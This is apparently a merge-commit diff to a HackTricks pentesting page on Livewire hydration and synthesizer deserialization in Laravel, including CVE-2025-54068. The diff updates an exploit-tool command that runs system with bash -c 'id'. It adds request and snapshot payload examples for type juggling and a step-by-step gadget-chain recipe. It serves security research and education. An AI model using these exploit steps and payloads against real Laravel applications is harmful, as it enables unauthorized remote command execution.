Merge pull request #1943 from HackTricks-wiki/research_update_src_pentesting-web_deserialization_livewire-hydration-synthesizer-abuse_20260225_024100

Research Update Enhanced src/pentesting-web/deserialization/...

Author: carlospolop

src/pentesting-web/deserialization/livewire-hydration-synthesizer-abuse.md

@@ -71,14 +71,16 @@ Leveraging Livewire's instantiation primitives, Synacktiv adapted phpggc's `Lara
 `synacktiv/laravel-crypto-killer` now ships a `livewire` mode that stitches everything:
 
 ```bash
-./laravel_crypto_killer.py -e livewire -k base64:APP_KEY \
+./laravel_crypto_killer.py exploit -e livewire -k base64:APP_KEY \
   -j request.json --function system -p "bash -c 'id'"
 ```
 
 The tool parses the captured snapshot, injects the gadget tuples, recomputes the checksum, and prints a ready-to-send `/livewire/update` payload.
 
 ## CVE-2025-54068 – RCE without `APP_KEY`
 
+According to the vendor advisory, the issue affects Livewire v3 (>= 3.0.0-beta.1 and < 3.6.3) and is unique to v3.
+
 `updates` are merged into component state **after** the snapshot checksum is validated. If a property inside the snapshot is (or becomes) a synthetic tuple, Livewire reuses its meta while hydrating the attacker-controlled update value:
 
 ```php
@@ -95,6 +97,21 @@ Exploit recipe:
 
 1. Find a Livewire component with an untyped public property (e.g., `public $count;`).
 2. Send an update that sets that property to `[]`. The next snapshot now stores it as `[[], {"s": "arr"}]`.
+
+   A minimal type-juggling flow looks like this:
+
+   ```http
+   POST /livewire/update
+   ...
+   "updates": {"count": []}
+   ```
+
+   Then the next snapshot stores a tuple that keeps the `arr` synthesizer metadata:
+
+   ```json
+   "count": [[], {"s": "arr"}]
+   ```
+
 3. Craft another `updates` payload where that property contains a deeply nested array embedding tuples such as `[ <payload>, {"s":"clctn","class":"GuzzleHttp\\Psr7\\FnStream"} ]`.
 4. During recursion, `hydrate()` evaluates each nested child independently, so attacker-chosen synth keys/classes are honoured even though the outer tuple and checksum never changed.
 5. Reuse the same `CollectionSynth`/`FormObjectSynth` primitives to instantiate a Queueable gadget whose `$chained[0]` contains the phpggc payload. Livewire processes the forged updates, invokes `dispatchNextJobInChain()`, and reaches `system(<cmd>)` without knowing `APP_KEY`.
@@ -112,6 +129,7 @@ Key reasons this works:
 - Fingerprints the deployed Livewire version by parsing `<script src="/livewire/livewire.js?id=HASH">` and mapping the hash to vulnerable releases.
 - Collects baseline snapshots by replaying benign actions and extracting `components[].snapshot`.
 - Generates either an `updates`-only payload (CVE-2025-54068) or a forged snapshot (known APP_KEY) embedding the phpggc chain.
+- If no object-typed parameter is found in a snapshot, Livepyre falls back to brute-forcing candidate params to reach a coercible property.
 
 Typical usage:
 
@@ -139,5 +157,6 @@ python3 Livepyre.py -u https://target/livewire/component -a base64:APP_KEY \
 - [Synacktiv – Livewire: Remote Command Execution via Unmarshaling](https://www.synacktiv.com/publications/livewire-execution-de-commandes-a-distance-via-unmarshaling.html)
 - [synacktiv/laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
 - [synacktiv/Livepyre](https://github.com/synacktiv/Livepyre)
+- [GHSA-29cq-5w36-x7w3 – Livewire v3 RCE advisory](https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3)
 
 {{#include ../../banners/hacktricks-training.md}}